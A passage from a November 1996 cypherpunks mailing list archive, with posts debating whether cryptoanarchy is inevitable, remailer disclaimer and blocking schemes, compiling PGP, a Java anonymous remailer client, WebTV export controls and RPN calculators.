encrypt it in these cases, not one of my "nearly totally necessary"
needs above).  They never pinpoint why.  It's one of those things
where I think they're afraid to admit to me that they are afraid to
use it, although I can't quite be sure at this time.  These tend to be
people who have some light to medium reasons to use it -- a law
student; a computer programmer who works arbitrating disputes at his
job; a business owner who administers quite a few programmers,
projects, and communications systems, as well as sales deals,
conspiring to steal work from people (that he knows or doesn't know)
and sell it, etc. (and uses scheduled recreational substances on the
side to a degree not unusual for his position) -- he even specifically
acknowledged that using encryption programs makes him fear that he is
opened up to litigation.

Anyway, regardless of their actual positions on usage of encryption
today, I think it's potential that not all of the people avoiding PGP
are of the "but it's too hard to use" variety.

So, just how many people would protest the persecution of users of
encryption, if such users are labeled, oh you know, evil this and evil
that (some of which may be true, much of which may be false):
 * Robber
 * Terrorist
 * Rapist
 * Kidnapper
?  Many people might not really want to risk the above, to guard in
favor of the below:
 * Laywer
 * Banker
 * Gay person
 * Person sueing someone else for something that someone else did
 * Various monetary transactions
 * Spaceless information collaboration (work, play, society, etc.)
 * Prostitutes & Drug Dealers

Well, ok, my image of what is legitimate probably is a bit blurred in
the view of others' minds ;) but the point goes to show just how
difficult it is to draw the line in such a way *TODAY* that the mass
populace will say "oh yeah we need crypto, government go to hell".

However, after a number of years (the amount of which is not simple to
determine but which many estimates can be made -- widespread SSL
availability, etc. etc.), if people become familiar with crypto and
its uses, or even if they are totally unfamiliar with it and use it
constantly and someone points out that its outlaw would disallow them
from some activity they personally regard dear (whatever that may be;
let me imagine: home shopping; talking to their lawyer; logging into
their ISP; doing their work at home; doing their international work at
all; whatever, the application of cryptography has been so limited
that often we forget how useful it is!  oh e.g., doing collaborative
work on their computer; merely using a special networked OS that may
be ubiquitous in the future), *then* these same people may be bent
more towards protesting government outlaw of crypto.

I'm not quite 100% sold that cryptoanarchy is inevitable, although I'm
certainly not convinced the other way either.  In any event, stopping
cryptography will be extremely difficult, since a lot of people who
really have no business fucking with the government like me will
suddenly come out of the woodwork to defend cryptography with a
vengeance because of the number of applications that we personally
find dear (my favorite: middle and lower class (and of all races,
etc. etc.) people having increased capabilities that only more monied
people could normally afford without as much cryptography, meaning
that everyone isn't as locked into their classes as would be without
widespread cryptography, meaning (hopefully) less discrimination &
strife, and more quality of life); just how that battle turns out may
be never be known (the most likely scenereo in my opinion, and one I
hope for).

[Above are opinions based on personal experiences; by posting I intend
to elicit responses and ultimate change, if appropriate.]

[P.S. where do I get PGP 2.7.* from?]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAwUBMoOYvZxWhFYc6x9VAQEu2Qf9HJ1C0QzB4V8xg7hK6+RQHR86MDwV3D69
Ok2WzZVgVh5QWjvTr0r0L4zBmXjIf0gdjOUWfG/lzbdtBqEOuB5IWROuSOwlfirB
Sdw91UoqbwswoC82gQUvyyh2fiKt6TYaDYTLm10S+Sp28xS1pWTfCromKrInoVa2
MBB3MyZS+J8T/buV4FxzBZngenU3TF/Mt7EymzQXlYaARMA8OtUZ0e66Kf+smIy8
eiaPaBd8aq3OYd7H2OF14I4clqGGCUkqD+iDrpnrzvcEiTr69ypzbFqBbACkpGbf
1WtLOso8Uwx/5bFH+IAPwLerBkTAxfEeDQXq+QrXMqSfff2UyUZ5uw==
=hxpz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Sat, 9 Nov 1996 01:31:44 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Information [for new PGP user]
Message-ID: <847531595.526905.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> >I'll bet you can't find 10 out of 1,000 users who have read the total source,
> >let alone comprehended and validated it.
> 
> Depending on the system, compiler and version of PGP, compilation may or
> may not function as expected.


I know,

I class myself as quite an experience programmer (though I haven`t 
done a lot of code recently) but I spent several days weeding through 
the bugs and it still wouldn`t compile on Borland C++ V4.51 so I just 
read the core code and hoped the executable was really derived from 
that code. I`m normally more paranoid than that but I just don`t have 
the time to spend getting borland to compile it. It won`t even 
compile on my system with the borland makefile than comes with PGP.

Has anyone else on here managed to get it to compile under Borland 
and how long did it take them????


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Sat, 9 Nov 1996 01:42:20 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <847531595.526906.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> It appears to be widely believed that cryptoanarchy is irreversible.
> Everybody believes that the race to deploy or forbid strong cryptography
> will define the outcome for a long time.

This is certainly my position...

 
> I can't think of a reason why this should be so.

> If the wide use of strong cryptography results in widely unpopular
> activities such as sarin attacks and political assassinations, it
> would not be all that hard to forbid it, even after deployment.

I don`t think so. The point is that cryptoanarchic ideals and strong 
cryptography will be too widely deployed to remove them from 
circulation. Also I believe that the sheer amount of traffic over the 
internet will make it virtually impossible to find encrypted messages 
even if strong encryption is outlawed. And last but not least the 
system of anonymous remailers and the ease with which return 
addresses can be forged means people using strong cryptography 
couldn`t be traced anyway.  


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Thu, 7 Nov 1996 21:15:56 -0800 (PST)
To: rcgraves@ix.netcom.com
Subject: Re: Blocking addresses by default
In-Reply-To: <199611072025.PAA22083@spirit.hks.net>
Message-ID: <199611080315.QAA17329@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996 15:25:07 -0500, Rich Graves wrote:

   remailer@nowhere.com looks for "$$" as the first line of the message, 
   and strips everything up to the next occurrence of "$$". It then appends 
   its own disclaimer block before sending the message to the hop (remailer 
   or final destination).

   A bit annoying, yes, but I think this would go a long way towards 
   improving public relations. I don't see how it compromises security.

Neither do I.  I think it should use something like a line of dashes,
or maybe a C comment, though, rather than $$, to make it look
'prettier' for the eventual recipient, and clarify that it's not part
of the original message.

   What's wrong with this scheme? Other than the fact that all remailers 
   would have to change their software at the exact same moment. :-)

This is not true, of course.  Implement it in two stages.  First
recognise and strip the disclaimer, but don't prepend one, then, when
all remailers are doing this, start prepending information.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
I must have slipped a disk -- my pack hurts




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 13:37:05 -0800 (PST)
To: "Thomas C. Allard" <m1tca00@FRB.GOV>
Subject: Re: [NOISE] If the shoe fits, wear it [VULIS]
In-Reply-To: <199611081612.LAA04764@bksmp2.FRB.GOV>
Message-ID: <Pine.SUN.3.94.961108163454.946B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Nov 1996, Thomas C. Allard wrote:

> 
> Rich Graves <rcgraves@ix.netcom.com> said:
> 
> > networks@vir.com wrote:
> > >  The nature of the Internet means it is extremely difficult for John
> > > to prevent Dr. Vulis from either posting using a pseudonym or having
> > > messages forwarded to him.  IF it were possible to prevent Vulis
> > > from either reading messages or posting do you think John would have
> > > done that too?  Just curious.
> >
> > I think that gets into "how many angels can dance on the head of a 
> > pin"  territory, because it just isn't, and I certainly don't speak 
> > for him.  But...
> 
> What if John didn't prevent him "suvscribing", but instead directed his 
> software to simply send messages from Vulis back to him as though they were 
> sent to the list, but in fact did not forward his messages to the rest of 
> the list.  Vulis would continue to (spit) and (fart) on the list, would 
> assume everyone else saw it, but would not see any replies to his spew.  
> His remailer (spits) would still get through, but think how much less noise 
> there would be.

Easily circumvented by a subscription to cypherpunks under another name,
which I assume Vulis has already done.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Thu, 7 Nov 1996 21:19:21 -0800 (PST)
To: roach_s@alph.swosu.edu
Subject: Re: [rant] Re: Censorship on cypherpunks
In-Reply-To: <199611071856.KAA18731@toad.com>
Message-ID: <199611080339.QAA17498@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996 10:56:01 -0800 (PST), Sean Roach wrote:

   Actually, I was comparing some people on the list, who were saying someone
   could always start thier own list, with those who advocate telling someone
   to start a new country as opposed to making their vote count.  This is a

This is a ridiculous comparison.

Starting your own country is virtually impossible, not to mention
unthinkably expensive, and if you could do it, it would mean packing
up and physically moving to another location -- something you may not
want to do (especially since your new country would surely have none
of the amenities you're used to -- indoor plumbing, supermarkets,
etc.)  Starting your own list, on the other hand, is almost as easy as
breathing, requires no great expense, and doesn't preclude you from
also being a member of this list.

   free country where we, fortunately, don't have to hang around, and, this is

You don't have to stay in the US, but if you want to leave you do have
to find somewhere else to go.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Reader, suppose you were an idiot.  And suppose you were a member of
Congress.  But I repeat myself.
		-- Mark Twain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Fri, 8 Nov 1996 13:42:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611082141.QAA32413@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Well, this is becoming a rather long thread, but I'll just make what I
think are the key points:

If, as is presumed in this discussion, society will become divided into
two somewhat distinct groups of people, the crypto-anonymous group and
the traceable-identifiable group, then the predictable outcome is that
members of the traceable-identifiable group will become increasingly
victimized by members of the crypto-anonymous group.  People who are
easily identifiable and tracked are easy prey.

For example, if you can see when John Doe is logged in at home or
logged in at his office, then you can burglarize his home while he is
at the office and vice versa.  If, as some government agencies would
like, all motor vehicle records were online, a criminal could go
'shopping' on the internet, pick out the make and model he wants,
look up the owner's address and go steal it.  There are lots of other
examples, such as seeing how much money is in various people's bank
accounts, then target those who have money, etc...
(Identifiable people are also likely to be targets of spam and other
annoyances, and I suspect the proliferation of spam is encourgaing
a great number of people to explore the possibilities for anonymous
posting.)

This situation is going to put an increasing amount of pressure on
those in the traceable-identifiable group to change their ways.  They
will have two choices: either they start using crypto, remailers, etc
to protect their privacy and protect themselves from criminals, or
they can demand more identification and restrict their interactions
with others such that they only associate with suitably identified
persons.

The net result of this is that it's easy (and economically desirable)
for people in the 'traceable-identifiable' group to join the 
'crypto-anonymous' group, but vary hard for anonymous personas to
interact with the identified group.  As such, the number of people
demanding identification of their correspondents will decline.
(Another way to look at it, is that crypto-anonymity is a high-entropy,
and hence stable, situation, whereas tracable-identifiability is a 
low-entropy and metastable state, which spontaneously degrades into
the former in the absense of a constraining force.)

This is why cryptoanarchy is inevitable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 16:51:43 -0800 (PST)
To: Rich Graves <cypherpunks@toad.com
Subject: Re: WebTV a "munition"
Message-ID: <199611090051.QAA20055@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 PM 11/8/96 -0800, Rich Graves wrote:
>Eric Murray wrote:
>> 
>> Page 3 of the San Jose Mercury News has a small blurb
>> about WebTV's browser/set-top box that "uses
>> computer-security technology so powerful that the
>> government is classifying it as a weapon
>> that will require a special export license before
>> it can be sold overseas".[...]
>> shouldn't be too difficult.  If they didn't use the "export"
>> level SSL CipherTypes, then what're they up to?  Are they
>> fighting crypto export laws (for which they should be congratulated
>> and supported) or are they just looking for free publicity?
>
>Based on the lack of public policy pronouncements from the WebTV folks, 
>I would answer C) They're clueless. I'm not sure that management even 
>understood, or wanted to understand, that they'd have an export problem.
>See http://www.webtv.net/


However, I estimate that the "investment" of probably under $1 million, and 
certainly under $10 million dollars, would easily sweep away any legal 
obstacle to the export of these devices.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Fri, 8 Nov 1996 09:12:47 -0800 (PST)
To: CP <cypherpunks@toad.com>
Subject: [NOISE] A modest :-) proposal
Message-ID: <9611081712.aa11601@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


	To make things more crypto-relevant, I suggest a new source of
noise should be analysed for crypto-security: this list. Of course,
this should be done with an *un*filtered version of the list as
filtering decreases noise.

	Derek

http://www.maths.tcd.ie/~dbell/key.asc <- my public key available here
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMoNp+FXdSMogwMcZAQFt3gP/WzfxzkOvc7gcTS2RL6Eiv3/hztGzdg6n
PCC8xroKl+UZ6U9w/5EioB2GrEexc7QpcfWozqYqIeEfy8ZJlvKLU25/1cpWZrCe
NrWWi+lsUanMUWn1JdkdjKFyEuHZl/E4FLjp9Fyy6C15scWJzeoISPKlSjru1qv7
A8pp3lyG/84=
=u5Gn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 8 Nov 1996 17:15:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
In-Reply-To: <199611081616.IAA21577@slack.lne.com>
Message-ID: <3283DB50.2847@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> 
> Eric Murray wrote:
> >
> > Page 3 of the San Jose Mercury News has a small blurb
> > about WebTV's browser/set-top box that "uses
> > computer-security technology so powerful that the
> > government is classifying it as a weapon
> > that will require a special export license before
> > it can be sold overseas".[...]
> > shouldn't be too difficult.  If they didn't use the "export"
> > level SSL CipherTypes, then what're they up to?  Are they
> > fighting crypto export laws (for which they should be congratulated
> > and supported) or are they just looking for free publicity?
> 
> Based on the lack of public policy pronouncements from the WebTV
> folks, I would answer C) They're clueless. I'm not sure that
> management even understood, or wanted to understand, that they'd have
> an export problem.
> See http://www.webtv.net/

Since Pablo Calamera works there, they can't be too clueless.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Fri, 8 Nov 1996 09:22:30 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com>
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007803aea873ff3acc@[207.167.93.63]>
Message-ID: <9611081721.aa12122@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <v03007803aea873ff3acc@[207.167.93.63]>, "Timothy C. May" writes:
>Lucaciewicz, as I recall. His notation was originally that one would add
>two numbers, a and b, as "+ a b." A modified form, adapted for stack
>machines, was to add two numbers with "a b +." Hence, _reverse_ Polish
>notation, but equally sound.

	He also did some work on multi-valued logic, IIRC.

>And for those of you are not LISP or Scheme fans, the language FORTH also
>uses Polish notation. RPN, in fact.

	Yep, FORTH uses it for everything, including IF statements!

	e.g.
	< IF ." The Second on stack is smaller than Top Of Stack"  THEN

	Derek

http://www.maths.tcd.ie/~dbell/key.asc <- my public key here
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMoNsLFXdSMogwMcZAQFtyQP+JIYnLgw754fE2Ku69ubk+yQolODBe2su
KnQUOehxhZK2PvV0DQt7qWeMaKbbdmA8gxWKDBakX/2zuKuiUWbEzz2d53tEKt7s
QGBgxOyaBNeWQVSACb5/rbKVH34rL7qUCxMatq5shsiBfvoPndePMeS/5qFjmt39
AbKJz+EDbuc=
=SkNM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brazie@ipa.net (Brazie)
Date: Fri, 8 Nov 1996 15:27:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611082327.RAA21927@dogbert.ipa.net>
MIME-Version: 1.0
Content-Type: text/plain


UNSCRIBE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 8 Nov 1996 01:34:26 -0800 (PST)
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: URG_ent
In-Reply-To: <9611051935.AA04338@spirit.aud.alcatel.com>
Message-ID: <Pine.WNT.3.95.961108172406.-1026703P-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On their ftp site they also have a version using SSL (via EAY's DLL's) 
supporting strong ciphers. The documentation, unfortunately, is very
terse. Otherwise it looks like a nice piece of middleware for implementing
secure TCP relays and tunnels. 

Enzo

On Tue, 5 Nov 1996, Daniel R. Oelke wrote:

> 
> 
> Not to beat up on Medcom - but doesn't this sound like a
> nice DES cracking target?
> 
> > 
> >  "Medcom introduces a "Super Cafe" data encryption product"
> > 
> >     Medcom's latest data encryption product, the Secure Socket 
> >     Relay (SSR), features strong encryption with full key length 
> >     (56-bits DES). A demo version can be downloaded at
> >     http://www.medcom.se/.
> > 
> > 
> ------------------------------------------------------------------
> Dan Oelke                                  Alcatel Network Systems
> droelke@aud.alcatel.com                             Richardson, TX
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoffrey KEATING <geoffk@discus.anu.edu.au>
Date: Thu, 7 Nov 1996 22:41:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anonymous remailer client in Java
Message-ID: <199611080640.RAA19222@discus.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


I have set up a Java client for type 1 anonymous remailers at
<http://www.ozemail.com.au/~geoffk/anon/anon.html>.

The client features a simple type-and-click interface, PGP encryption,
automatic remailer chaining, and a 100% java implementation---no
native code required. It has been tested under Netscape and Sun's
AppletViewer on MacOS and Solaris. It will let you create simple reply
blocks (those which don't encrypt the message).

This is intended as a better way to post mail anonymously via the
web (especially since Community ConneXion's https service seems to
have shut down).

Flaws:

- Persons in the US will not be able to use it unless they have a
license from RSA (which is unlikely).

- It doesn't do Mixmaster remailers yet (but it will soon).

- It can't actually send the mail if you're behind a firewall, but it
will PGP encrypt a message for you to send.

- It has to send all its mail via the HTTP server's machine because of
applet security restrictions---you can fix this by making a local
copy, or (if you're brave) giving it more permissions. The mail is
encrypted from your machine, so this isn't insecure, just slow and a
waste of bandwidth.

Ideally, it would run from a web site on the same machine as an
anonymous remailer, and use that as the first hop in the chain. If
anyone (outside the US, of course) would be interested in setting this
up, please e-mail me at the address below.

Please CC any followups, as I am not presently subscribed to
cypherpunks.

-- 
Geoff Keating <geoffk@ozemail.com.au>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Fri, 8 Nov 1996 15:08:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Universal Service for the Net: Why it's a bad idea
Message-ID: <9611082306.AA24281@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:53 AM 11/8/96 -0800, Declan McCullagh <declan@well.com> wrote:

8< [snip]

>* Why should a Beverly Hills high school get a discount of 20 percent?
>  Can't they afford to pay for ISDN?

Depends on how their telco's tariffs are set up.  Here in Indiana,
we have a monopoly called "Ameritech" who, out of the kindness of 
their hearts, charges ***per-minute*** ISDN rates.  Expect costs 
of over $600/month for a permament connection (one line) to the 
Internet.  Beverly Hills High School *might* be able to afford it.
Most other places can't.  <sigh>

Best Regards,


Frank

  
Any sufficiently advanced bug is indistinguishable from a feature.
	-- Rich Kulawiec

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Vendor-Neutral Information Security Consulting 
http://www.fortified.com     Phone: (317) 573-0800     FAX: (317) 573-0817     
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Garvey <jgarvey@BayNetworks.com>
Date: Fri, 8 Nov 1996 15:07:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: research help
Message-ID: <3283BED3.31DFF4F5@baynetworks.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all.

I'm writing a paper for a class I'm in.  It has to answer the question
"What evidence is there that new information technology poses a threat
to out privacy?"

I was wondering if anyone knew of some really good online sources I
could access and use.

Any help would be greatly appreciated.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 8 Nov 1996 15:50:56 -0800 (PST)
To: Marshall Clow <mclow@owl.csusm.edu>
Subject: RE: Smart Bombs
Message-ID: <9610088475.AA847507822@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain




Marshall Clow <mclow@owl.csusm.edu> wrote:
>James wrote:
>>Of course, not having a card may subject you to greater scrutiny at check-in
>>time due to the reduced tracking ability. 
>>
>I think that you have this backwards. There will be less tracking ability for
>people flying w/o tickets.
 
Less tracking for people w/o tickets, but more scrutiny for people w/o smart
cards.
 
I can easily see the working assumption that smart carded people have _already_
passed the security check, while those who pay cash would be under greater
scrutiny.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: YoungSik Jeong <youngsik@cnct.com>
Date: Fri, 8 Nov 1996 15:45:35 -0800 (PST)
To: Cypherpunks@toad.com
Subject: No More
Message-ID: <2.2.32.19961108235312.00681fcc@cnct.com>
MIME-Version: 1.0
Content-Type: text/plain


I want take off mail list





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 8 Nov 1996 16:01:59 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: RE: His and Her Anarchies
Message-ID: <9610088475.AA847508443@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


>Black Unicorn <unicorn@schloss.li> wrote:
>I'm sure if I look hard enough, I'll find the crypto content in here.
>
>On Fri, 8 Nov 1996 jbugden@smtplink.alis.ca wrote:
>
>> Copyright c 1996, The Globe and Mail Company r
>> 
>> U.S. election reveals his and her politics 
>> Educated women have different agenda 

I think it relates to crypto policy via policy in general, also to both the
libertarian and the inevitable cryptoanarchy argument we are currently tossing
about and brought to mind a comment a few months back from Tim about how the
occasional female members of this list tended to not make sense a lot of the
time.

Sorry if it wasn't clear enough. I had expected a comment regarding the smart
bomb message since it would have been better to send to the risks list.

Ciao,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 8 Nov 1996 19:11:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <v03007803aea873ff3acc@[207.167.93.63]>
Message-ID: <v03007800aea9a5cba79b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:19 PM -0500 11/8/96, David Lesher / hated by RBOC's in 5 states wrote:
>As a HP-35 buyer when they first appeared in '72, I sonn found it
>simple to explain RPN by using a basic rule of good composition:
>avoid passive voice.
>
>The "+" key is not, of course "plus" rather it is the active voice
>term "add" and such.. And all commands are "active voice" unlike
>a TI where some were...
>
>Of course, I soon found far too many people had no grasp of active
>vs. passive voice........

Agreed. I think I adapted to RPN so quickly (less than 30 minutes at the
university bookstore, which had H-P 35s on display) because of this.

The problem "((5 + 7) * 4) / 3)" is easily understood as:

5 enter 7 add 4 multiply 3 divide

Once one groks RPN, it clearly is a speed win over entering parentheses and
that stuff. For any of you who are doubters, RPN usually produces far fewer
errors in identical calculations than Algebraic produces (the user errors,
not the hardware).

I found RPN ideal for exploratory calculations, where the stack orientation
was just so "natural."

This is not RPNpunks, but it seems that many of the younger subscribers
here really have not been exposed to RPN calculators. It's really worth the
$40 or so to buy the cheapest H-P calculator that has RPN.

(Be careful--not all H-P calculators are RPN these days. They bowed to
market pressure several years ago and introduced algebraic entry on their
low-end models.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 8 Nov 1996 15:41:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Blocking addresses by default
In-Reply-To: <199611072025.PAA22083@spirit.hks.net>
Message-ID: <Pine.LNX.3.95.961108192926.947A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Nov 1996, Rich Graves wrote:

> I think this threatens serious security problems for the remailer
> network in two ways:
> 
> 1. You'd create a list of people interested in anonymous information,
>    which could potentially be obtained by police or other armed thugs.

True.  I wasn't proposing any centralized list or a complete alternative to
the current way remailers are set up.  Just an alternative for some people who
don't have time to go through all the complaints.  The only unblocked addresses
could just be the addresses of other remailers.  Others could be set up to
only deliver mail to other remailers, mailing lists, and newsgroups.

> 
> 2. The traffic would go down so substantially that traffic analysis
>    would be trivial.

If every remailer adopted this system, then this would be true.

> As a counterproposal, I'd like to see better disclaimers on remailed
> messages. The reason the people complaining are so pissed off is that
> the blocklists are neither advertised nor automated enough. I'd like to
> see disclaimers and block list instructions at the top of the body of
> every single message. This would be encapsulated in some mark characters
> so that it could easily be removed by remailer chains. E.g.,

This is a good idea.  I also like the idea of remailers forwarding some sort
of notification to a first-time recipient where the recipient actually has to
request that the mail be delivered.  However, the storage requirement might be
a little impractical for some remailers.  If the disclaimers are really
annoying, it would be easy enough to remove these disclaimers with a simple
procmail recipe or some equivalent.


> What's wrong with this scheme? Other than the fact that all remailers
> would have to change their software at the exact same moment. :-)

The "cutmarks" option would allow backwards compatability.  Alternatively, the
remailer might be able to determine whether the next hop is a "real" email
address or another remailer.  I believe this would be pretty easy with
Mixmaster since a remailer can tell if it is the final hop or not.


Mark






-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoPTpizIPc7jvyFpAQGYHggAqERGxbUu4LcGmP6qgN47claY9cttmWQ+
LIxHFKKxut92mSVMfDD80WGlXZAQb/p97t//m6aGZ3cCFXe8JPlVfyqrzz4A4/JK
pN3lbn0Vfk08CVePFZaBqk8yiE+K7ZpjE1vTx8GTna0n+ZHpC6RZ1DBNwWrif4PH
kLUl4cFHYeHhe9qfZrc+rjUcxe0yMM9hhJ3uW1SUaUvLeXNuwjaftil5ULX1pegt
2JLYZkX7UF7EAUA2GvKj1KoDhVoQjT5tbRcIbV20n8r8mQjQuecUqZXP/P9D1zbC
lwilKC5z2+0wErr9MvseLH9CEriVQhT0EN1fWxZjB3MfrCFRdNDO9w==
=xP+H
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 20:08:39 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Nightmare on Crypto Street, Part 1"
Message-ID: <v02140b01aea9abf3eda8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 11/8/1996, Timothy C. May wrote:
> And whenever any of us raised issues of Constitutionality of the measures
> Peter was predicting, such as random searches, conviction based on
> possession of an illegal tool, forced escrow, etc., it seemed that Peter's
> response was usually some variant of:

> "Won't matter. The people will demand action."

Yes, in a pogrom situation, the Constitution is not much protection.

However, you can do quite a bit without straying far outside the
bounds of the Constitution.  Certainly without straying farther
than the Supreme Court has already done.

Random searches are probably not necessary and the procedure of issuing
search warrants need not change.  Instead of making the transmission
of encrypted messages illegal, encrypted messages become just cause
for a search of somebody's house for illegal cryptography software.

There is no prior restraint of free speech in this legal scenario.

What you make illegal is the possession and operation of cryptography
software.

Consider this analogy: I get up on a podium and announce "I shot
the Sheriff."  I have a legal right to do this.  However, if somebody
did recently shoot the sheriff, it is also likely that my house
will be searched.

The degree to which the Constitution needs to be eroded is slight
if there is broad popular support for the measures.  The reason
for this is that the list of suspects will be short.  If the
list of suspects is short, you can go to some trouble to follow
